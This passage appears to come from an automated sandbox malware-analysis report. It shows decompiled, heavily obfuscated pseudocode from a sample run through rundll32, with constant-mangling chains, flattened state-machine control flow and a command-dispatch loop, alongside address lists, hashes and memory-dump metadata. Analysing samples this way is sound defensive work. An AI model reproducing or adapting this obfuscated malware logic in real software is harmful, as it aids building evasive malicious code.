				_v32 = _v32 ^ 0x5adaef9e;
				_v32 = _v32 ^ 0x34b54fa4;
				_v28 = 0xb293;
				_t126 = 0x3b;
				_v28 = _v28 * 0x2d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xfb1ed4cf;
				_v24 = 0x2b1c;
				_v24 = _v24 * 6;
				_v24 = _v24 / _t126;
				_v24 = _v24 ^ 0x00001462;
				_t104 = E00247551(_a16, _v24);
				_t127 = _t104;
				if(_t104 != 0) {
					_t128 = E00247663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
					E00254F7D(_v32, _v28, _t127);
				}
				return _t128;
			}

0x002460c2
0x002460c5
0x002460cc
0x002460cf
0x002460d0
0x002460d3
0x002460d6
0x002460d7
0x002460da
0x002460db
0x002460dc
0x002460e1
0x002460ea
0x002460ee
0x002460f0
0x002460f4
0x002460f8
0x002460ff
0x00246106
0x00246112
0x00246117
0x0024611c
0x00246123
0x0024612a
0x00246131
0x00246138
0x0024613f
0x00246149
0x0024614e
0x00246153
0x0024615a
0x00246161
0x00246168
0x0024616f
0x00246176
0x0024617a
0x0024617e
0x00246182
0x00246189
0x00246190
0x00246197
0x0024619e
0x002461a5
0x002461b0
0x002461b4
0x002461b7
0x002461bb
0x002461c2
0x002461cd
0x002461d5
0x002461d8
0x002461eb
0x002461f0
0x002461f7
0x00246211
0x00246217
0x0024621c
0x00246227

Strings

%3on, xrefs: 00246190

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: %3on
API String ID: 2962429428-3639271662
Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction ID: ad387907fc98c4d7e932983dcf4e232c736d2a8a4dde22936effd123d04a6c05
Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction Fuzzy Hash: 83411871E0120AABDB08DFE5C98A8EEFBB5FB44704F208159E911B7250D3B89B55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0024F536, Relevance: 1.3, Strings: 1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0024F536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t73;
				signed int _t84;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t73);
				_v28 = _v28 & 0x00000000;
				_v32 = 0x4854b3;
				_v8 = 0xdc0b;
				_t84 = 0x56;
				_v8 = _v8 * 0xf;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x0001e73e;
				_v12 = 0xfbc9;
				_v12 = _v12 + 0xb4de;
				_v12 = _v12 * 0x28;
				_v12 = _v12 ^ 0x0043d2f8;
				_v12 = 0x51f2;
				_v12 = _v12 + 0xffffcc79;
				_v12 = _v12 + 0xffffba87;
				_v12 = _v12 ^ 0xffffb404;
				_v12 = 0x6c9d;
				_v12 = _v12 / _t84;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0000581b;
				_v12 = 0x414e;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 | 0x4fdc2cbe;
				_v12 = _v12 ^ 0x4fdc7af3;
				_v12 = 0xe540;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x1b88e412;
				_v12 = _v12 ^ 0x1bebfc09;
				_v24 = 0x3d7;
				_v24 = _v24 + 0xffffb00b;
				_v24 = _v24 ^ 0xffff901a;
				_v20 = 0xd6b0;
				_v20 = _v20 ^ 0xee2b6cd1;
				_v20 = _v20 ^ 0xee2bf683;
				_v16 = 0x5822;
				_v16 = _v16 + 0xa5f;
				_v16 = _v16 ^ 0x00006b11;
				return E002508F3(_v12, _v24, _v20, _a8, _t84, E0024C506(_t84), _v16);
			}

0x0024f53c
0x0024f53f
0x0024f542
0x0024f543
0x0024f544
0x0024f549
0x0024f550
0x0024f559
0x0024f566
0x0024f567
0x0024f56a
0x0024f56e
0x0024f575
0x0024f57c
0x0024f587
0x0024f58a
0x0024f591
0x0024f598
0x0024f59f
0x0024f5a6
0x0024f5ad
0x0024f5b9
0x0024f5bc
0x0024f5bf
0x0024f5c6
0x0024f5cd
0x0024f5d1
0x0024f5d8
0x0024f5df
0x0024f5ea
0x0024f5ed
0x0024f5f4
0x0024f5fb
0x0024f602
0x0024f609
0x0024f610
0x0024f617
0x0024f61e
0x0024f625
0x0024f62c
0x0024f633
0x0024f65e

Strings

j^ , xrefs: 0024F536

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j^
API String ID: 0-2773993462
Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction ID: 30fa461a349b1a75491c97751446276537d269c06830ad0ba806d9d20c9c97b1
Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction Fuzzy Hash: 7531E0B4C0070AEBDF48DFA4C98A49EBFB5FB00305F608089D511BA2A0D3B94B959F85

Uniqueness

Uniqueness Score: -1.00%

Function 00255D1D, Relevance: .2, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00255D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _t165;
				intOrPtr* _t183;
				void* _t185;
				void* _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;

				_t183 = _a24;
				_push(_t183);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t165);
				_v96 = 0x1c20a7;
				_t194 = 0;
				_v84 = _v84 & 0;
				_t199 = _t198 + 0x20;
				_v92 = 0x7c153;
				_v88 = 0xb2086;
				_t185 = 0x2476afb9;
				_v8 = 0x4175;
				_v8 = _v8 + 0xffff57ff;
				_v8 = _v8 | 0xfffbf4ff;
				_v8 = _v8 ^ 0xffffd856;
				_v56 = 0x400d;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x01004a82;
				_v52 = 0xfa4b;
				_t195 = 0x3f;
				_v52 = _v52 * 0xf;
				_v52 = _v52 ^ 0x000ed31b;
				_v48 = 0x532b;
				_v48 = _v48 | 0xa8aca4f9;
				_v48 = _v48 ^ 0xa8acfbbc;
				_v44 = 0x6cab;
				_v44 = _v44 * 0xd;
				_v44 = _v44 ^ 0x0005813c;
				_v32 = 0xa076;
				_v32 = _v32 + 0x7ba7;
				_v32 = _v32 * 0x33;
				_v32 = _v32 ^ 0x0038af53;
				_v28 = 0x80ef;
				_v28 = _v28 << 0xb;
				_v28 = _v28 | 0xbfaa7514;
				_v28 = _v28 ^ 0xbfaf1f10;
				_v24 = 0x2421;
				_v24 = _v24 / _t195;
				_t196 = 3;
				_v24 = _v24 / _t196;
				_v24 = _v24 ^ 0x000050e2;
				_v68 = 0xf6e5;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0000085c;
				_v64 = 0x7950;
				_v64 = _v64 | 0xc26498fa;
				_v64 = _v64 ^ 0xc264e84e;
				_v60 = 0xb7cc;
				_v60 = _v60 + 0xffffacef;
				_v60 = _v60 ^ 0x0000478a;
				_v40 = 0x6379;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 << 5;
				_v40 = _v40 ^ 0x00006e22;
				_v20 = 0xe665;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0xe4ef8652;
				_v20 = _v20 + 0xffffeafe;
				_v20 = _v20 ^ 0xe52339cd;
				_v80 = 0x4d1e;
				_v80 = _v80 + 0xffffc710;
				_v80 = _v80 ^ 0x000046ed;
				_v16 = 0x18c;
				_v16 = _v16 >> 4;
				_t197 = _v80;
				_v16 = _v16 * 0x41;
				_v16 = _v16 ^ 0x73128289;
				_v16 = _v16 ^ 0x7312c7aa;
				_v12 = 0xdd0b;
				_v12 = _v12 + 0xffff65de;
				_v12 = _v12 * 0x3b;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x0f6bc641;
				_v76 = 0xf5b7;
				_v76 = _v76 ^ 0xdca6f1c9;
				_v76 = _v76 ^ 0xdca64fd3;
				_v36 = 0xdf9f;
				_v36 = _v36 + 0x7ffe;
				_v36 = _v36 + 0x4fda;
				_v36 = _v36 ^ 0x00019ee0;
				_v72 = 0x5c39;
				_v72 = _v72 ^ 0x85106c7e;
				_v72 = _v72 ^ 0x85105bd4;
				do {
					while(_t185 != 0x6efb3d4) {
						if(_t185 == 0xfd0cdc7) {
							_t197 = E002596CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
							_t199 = _t199 + 0x38;
							if(_t197 == 0) {
								L15:
								return _t194;
							}
							_t185 = 0x6efb3d4;
							continue;
						}
						if(_t185 == 0x1eddc4e8) {
							E002596CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
							if(_t183 != 0) {
								 *_t183 = _t197;
							}
							goto L15;
						}
						if(_t185 != 0x2476afb9) {
							goto L11;
						}
						_t185 = 0xfd0cdc7;
					}
					_push(_t185);
					_push(_t185);
					_t194 = E00248736(_t197);
					if(_t194 == 0) {
						_t185 = 0x710c028;
						goto L11;
					}
					_t185 = 0x1eddc4e8;
					continue;
					L11:
				} while (_t185 != 0x710c028);
				goto L15;
			}

0x00255d24
0x00255d29
0x00255d2a
0x00255d2d
0x00255d30
0x00255d33
0x00255d36
0x00255d3a
0x00255d3b
0x00255d40
0x00255d47
0x00255d49
0x00255d4c
0x00255d4f
0x00255d58
0x00255d5f
0x00255d64
0x00255d6b
0x00255d72
0x00255d79
0x00255d80
0x00255d87
0x00255d8b
0x00255d92
0x00255d9f
0x00255da2
0x00255da5
0x00255dac
0x00255db3
0x00255dba
0x00255dc1
0x00255dcc
0x00255dcf
0x00255dd6
0x00255ddd
0x00255de8
0x00255deb
0x00255df2
0x00255df9
0x00255dfd
0x00255e04
0x00255e0b
0x00255e19
0x00255e1f
0x00255e22
0x00255e25
0x00255e2c
0x00255e33
0x00255e37
0x00255e3e
0x00255e45
0x00255e4c
0x00255e53
0x00255e5a
0x00255e61
0x00255e68
0x00255e6f
0x00255e73
0x00255e77
0x00255e7e
0x00255e85
0x00255e89
0x00255e90
0x00255e97
0x00255e9e
0x00255ea5
0x00255eac
0x00255eb3
0x00255eba
0x00255ec2
0x00255ec5
0x00255ec8
0x00255ecf
0x00255ed6
0x00255edd
0x00255ee8
0x00255eeb
0x00255eef
0x00255ef6
0x00255efd
0x00255f04
0x00255f0b
0x00255f12
0x00255f19
0x00255f20
0x00255f27
0x00255f2e
0x00255f35
0x00255f3c
0x00255f3c
0x00255f4a
0x00255f92
0x00255f94
0x00255f99
0x0025600b
0x00256013
0x00256013
0x00255f9b
0x00000000
0x00255f9b
0x00255f52
0x00255ffd
0x00256007
0x00256009
0x00256009
0x00000000
0x00256007
0x00255f5e
0x00000000
0x00000000
0x00255f60
0x00255f60
0x00255fab
0x00255fac
0x00255fb4
0x00255fba
0x00255fc6
0x00000000
0x00255fc6
0x00255fbc
0x00000000
0x00255fcb
0x00255fcb
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction ID: 5a8a286b5554fc76e0bd5a50b552db3f72afc051e930f7d5abf9ed7320f26ecf
Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction Fuzzy Hash: 95913772C1021AABDF15CFE5D9895EEBFB5FF04314F208109E611762A0D3B90A65CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00250F0C, Relevance: .2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00250F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t132;
				signed int _t149;
				void* _t152;
				void* _t154;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t181;

				_push(_a20);
				_t152 = __edx;
				_push(0xffffffff);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t132);
				_v44 = 0x160;
				_t181 = _t180 + 0x1c;
				_v44 = _v44 ^ 0x1b432315;
				_v44 = _v44 ^ 0x1b433d06;
				_t179 = 0;
				_v12 = 0x3352;
				_t154 = 0x2476afb9;
				_v12 = _v12 + 0xffffca9f;
				_v12 = _v12 << 1;
				_t173 = 0x29;
				_v12 = _v12 / _t173;
				_v12 = _v12 ^ 0x063e5c60;
				_v8 = 0x701a;
				_t174 = 0x52;
				_v8 = _v8 / _t174;
				_t175 = 0x4e;
				_v8 = _v8 / _t175;
				_t176 = 0x41;
				_v8 = _v8 / _t176;
				_v8 = _v8 ^ 0x0000431a;
				_v40 = 0xf48c;
				_v40 = _v40 + 0xffff0dc2;
				_v40 = _v40 ^ 0x0000090f;
				_v36 = 0x5475;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x2a3aa88b;
				_v16 = 0xfc71;
				_v16 = _v16 ^ 0x0a975394;
				_v16 = _v16 | 0x3f9daa18;
				_v16 = _v16 + 0xffff523a;
				_v16 = _v16 ^ 0x3f9f63b5;
				_v48 = 0xbfc9;
				_t177 = 0x63;
				_v48 = _v48 / _t177;
				_v48 = _v48 ^ 0x0000151a;
				_v32 = 0xfc2a;
				_v32 = _v32 | 0x12ce1451;
				_v32 = _v32 + 0x3ff4;
				_v32 = _v32 ^ 0x12cf51f6;
				_v56 = 0x5ac8;
				_v56 = _v56 | 0xf85dcbd1;
				_v56 = _v56 ^ 0xf85dd81d;
				_v52 = 0x6e3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x0006be09;
				_v28 = 0x1612;
				_v28 = _v28 ^ 0x471c56e0;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0xffff1cc1;
				_v28 = _v28 ^ 0x238d2d3e;
				_v24 = 0x515e;
				_v24 = _v24 + 0x963f;
				_v24 = _v24 + 0xffff7349;
				_t178 = _v56;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000650d8;
				_v20 = 0x1a04;
				_v20 = _v20 | 0x2258a5ab;
				_v20 = _v20 + 0xffff2fa3;
				_v20 = _v20 + 0x9894;
				_v20 = _v20 ^ 0x2258a793;
				do {
					while(_t154 != 0x6efb3d4) {
						if(_t154 == 0xfd0cdc7) {
							_t149 = E00257AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
							_t178 = _t149;
							_t181 = _t181 + 0x24;
							if(_t149 != 0) {
								_t154 = 0x6efb3d4;
								continue;
							}
						} else {
							if(_t154 == 0x1eddc4e8) {
								E00257AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
							} else {
								if(_t154 != 0x2476afb9) {
									goto L11;
								} else {
									_t154 = 0xfd0cdc7;
									continue;
								}
							}
						}
						L14:
						return _t179;
					}
					_push(_t154);
					_push(_t154);
					_t179 = E00248736(_t178 + _t178);
					if(_t179 == 0) {
						_t154 = 0x710c028;
						goto L11;
					} else {
						_t154 = 0x1eddc4e8;
						continue;
					}
					goto L14;
					L11:
				} while (_t154 != 0x710c028);
				goto L14;
			}

0x00250f15
0x00250f18
0x00250f1a
0x00250f1c
0x00250f1f
0x00250f22
0x00250f24
0x00250f25
0x00250f26
0x00250f2b
0x00250f32
0x00250f35
0x00250f3e
0x00250f45
0x00250f47
0x00250f4e
0x00250f53
0x00250f5a
0x00250f62
0x00250f67
0x00250f6c
0x00250f73
0x00250f7d
0x00250f82
0x00250f8a
0x00250f8f
0x00250f97
0x00250f9c
0x00250fa1
0x00250fa8
0x00250faf
0x00250fb6
0x00250fbd
0x00250fc4
0x00250fc8
0x00250fcf
0x00250fd6
0x00250fdd
0x00250fe4
0x00250feb
0x00250ff2
0x00250ffc
0x00250fff
0x00251002
0x00251009
0x00251010
0x00251017
0x0025101e
0x00251025
0x0025102c
0x00251033
0x0025103a
0x00251041
0x00251045
0x0025104c
0x00251053
0x0025105a
0x0025105d
0x00251064
0x0025106b
0x00251072
0x00251079
0x00251084
0x00251087
0x0025108a
0x00251091
0x00251098
0x0025109f
0x002510a6
0x002510ad
0x002510b4
0x002510b4
0x002510c2
0x002510f5
0x002510fa
0x002510fc
0x00251101
0x00251103
0x00000000
0x00251103
0x002510c4
0x002510ca
0x00251157
0x002510cc
0x002510d2
0x00000000
0x002510d4
0x002510d4
0x00000000
0x002510d4
0x002510d2
0x002510ca
0x00251160
0x00251167
0x00251167
0x00251113
0x00251114
0x0025111d
0x00251123
0x0025112c
0x00000000
0x00251125
0x00251125
0x00000000
0x00251125
0x00000000
0x00251131
0x00251131
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction ID: b080dcf2474937c61f4d99698eaf314767f15a48ce5c3a162d6b45b288a43199
Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction Fuzzy Hash: 83618D72D1030AEBDF18CFA5C9859EEBBB2FF44310F248259E912B6290D3B54E558F90

Uniqueness

Uniqueness Score: -1.00%

Function 0024F444, Relevance: .1, Instructions: 128
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0024F444(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t120;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				intOrPtr* _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				void* _t159;
				void* _t160;

				_t128 = __ecx;
				_t152 =  *0x25ca24; // 0x0
				while(_t152 != 0) {
					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
					}
					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
				}
				_t129 = _t128 | 0xffffffff;
				_pop(_t153);
				_t160 = _t159 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_t126 = _t129;
				_t149 = 0x25ca24;
				_t130 = 0x77;
				_v8 = _v8 / _t130;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_t131 = 0x67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / _t131;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t154 =  *0x25ca24; // 0x0
				while(_t154 != 0) {
					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
						L10:
						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
						_t120 = E0024F536(_v20, _v40, _v48, _t154);
					} else {
						_t120 = E0025086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
						_t160 = _t160 + 0xc;
						if(_t120 != _v28) {
							_t112 = _t154 + 0x2c; // 0x2c
							_t149 = _t112;
						} else {
							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
							E0025422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
							E00254F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
							goto L10;
						}
					}
					_t154 =  *_t149;
				}
				return _t120;
			}

0x0024f444
0x0024f445
0x0024f460
0x0024f451
0x0024f45a
0x0024f45a
0x0024f45d
0x0024f45d
0x0024f464
0x0024f467
0x002598a6
0x002598a9
0x002598b2
0x002598c1
0x002598c3
0x002598c8
0x002598cd
0x002598d2
0x002598d6
0x002598dd
0x002598e8
0x002598e9
0x002598ec
0x002598f3
0x002598fa
0x00259901
0x00259905
0x0025990c
0x00259913
0x0025991c
0x0025991f
0x00259926
0x0025992d
0x00259934
0x00259937
0x0025993b
0x00259942
0x00259949
0x0025994d
0x00259951
0x00259958
0x0025995f
0x00259966
0x0025996a
0x00259971
0x00259978
0x0025997f
0x00259986
0x0025998d
0x00259994
0x0025999b
0x002599a6
0x002599a9
0x002599b0
0x002599b7
0x002599be
0x002599c1
0x002599c8
0x002599cf
0x002599d3
0x002599d7
0x002599de
0x00259a46
0x002599ea
0x00259a2e
0x00259a3b
0x00259a3d
0x002599ec
0x002599f9
0x002599fe
0x00259a04
0x00259a51
0x00259a51
0x00259a06
0x00259a0d
0x00259a19
0x00259a27
0x00000000
0x00259a2d
0x00259a04
0x00259a44
0x00259a44
0x00259a50

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbdeed3124bd50057cc1f0dc7c1710ab00d8b0a7be7af4ad7c635dca87b1874
Instruction ID: 47139db0499f099d65dcccfc8308518dd3984d2b6c177fde68e93cc5778b9313
Opcode Fuzzy Hash: bfbdeed3124bd50057cc1f0dc7c1710ab00d8b0a7be7af4ad7c635dca87b1874
Instruction Fuzzy Hash: 63515731D00709DFDB18CFA5D94A9DEFBB0FB08318F208159D915762A0C7B46A99CF98

Uniqueness

Uniqueness Score: -1.00%

Function 002571EF, Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002571EF(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v144;
				void* __ecx;
				void* _t94;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t120;
				void* _t142;
				void* _t144;
				void* _t146;
				void* _t147;

				_t147 = __eflags;
				_push(_a4);
				_push(__edx);
				E0024602B(_t94);
				_v20 = 0xa5d0;
				_v20 = _v20 | 0x3487ecbd;
				_v20 = _v20 + 0xffff03d0;
				_t142 = 0;
				_v20 = _v20 + 0x3a47;
				_v20 = _v20 ^ 0x348731c7;
				_v28 = 0xdd31;
				_v28 = _v28 << 0x10;
				_v28 = _v28 | 0x8f0862d8;
				_v28 = _v28 ^ 0xdf391de9;
				_v16 = 0xb0e;
				_v16 = _v16 << 4;
				_v16 = _v16 << 0xa;
				_t120 = 0x14;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x461d447c;
				_v12 = 0xa74;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0x835b;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0053bc14;
				_v36 = 0xa6cf;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x000104b7;
				_v24 = 0x4d22;
				_v24 = _v24 >> 6;
				_v24 = _v24 + 0xef2f;
				_v24 = _v24 ^ 0x0000ed15;
				_v44 = 0x3931;
				_v44 = _v44 * 0x11;
				_v44 = _v44 ^ 0x00039362;
				_v40 = 0xec47;
				_v40 = _v40 ^ 0x28f00c99;
				_v40 = _v40 ^ 0x28f09017;
				_v32 = 0x2800;
				_v32 = _v32 / _t120;
				_v32 = _v32 ^ 0x971b94ed;
				_v32 = _v32 ^ 0x971b9d0a;
				E002550F2( &_v144, _v20, _v28, _v16, __edx);
				_t146 = _t144 + 0x18;
				L13:
				if(E0024B055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
					_t106 = E00241280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
					_t146 = _t146 + 0x10;
					__eflags = _t106;
					if(__eflags != 0) {
						_t108 = _v56 - 1;
						__eflags = _t108;
						if(_t108 == 0) {
							E00246754(_v60,  &_v52);
						} else {
							_t110 = _t108 - 1;
							__eflags = _t110;
							if(_t110 == 0) {
								E00248F78(_v60,  &_v52);
							} else {
								_t112 = _t110 - 1;
								__eflags = _t112;
								if(_t112 == 0) {
									E002526F5(_v60,  &_v52);
								} else {
									_t114 = _t112 - 1;
									__eflags = _t114;
									if(_t114 == 0) {
										E00244A35(_v60,  &_v52);
									} else {
										__eflags = _t114 == 6;
										if(_t114 == 6) {
											E002469A0(_v60,  &_v52);
										}
									}
								}
							}
						}
						_t142 = _t142 + 1;
						__eflags = _t142;
					}
					goto L13;
				}
				return _t142;
			}

0x002571ef
0x002571fa
0x002571ff
0x00257201
0x00257206
0x00257210
0x00257219
0x00257220
0x00257222
0x00257229
0x00257230
0x00257237
0x0025723b
0x00257242
0x00257249
0x00257250
0x00257254
0x0025725e
0x00257260
0x00257263
0x0025726a
0x00257271
0x00257275
0x0025727c
0x0025727f
0x00257286
0x0025728d
0x00257290
0x00257297
0x0025729e
0x002572a2
0x002572a9
0x002572b0
0x002572bb
0x002572be
0x002572c5
0x002572cc
0x002572d3
0x002572da
0x002572ec
0x002572ef
0x002572f6
0x00257306
0x0025730b
0x00257384
0x0025739e
0x00257324
0x00257329
0x0025732c
0x0025732e
0x00257333
0x00257333
0x00257334
0x0025737e
0x00257336
0x00257336
0x00257336
0x00257337
0x00257371
0x00257339
0x00257339
0x00257339
0x0025733a
0x00257364
0x0025733c
0x0025733c
0x0025733c
0x0025733d
0x00257357
0x0025733f
0x0025733f
0x00257342
0x0025734a
0x0025734a
0x00257342
0x0025733d
0x0025733a
0x00257337
0x00257383
0x00257383
0x00257383
0x00000000
0x0025732e
0x002573ab

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

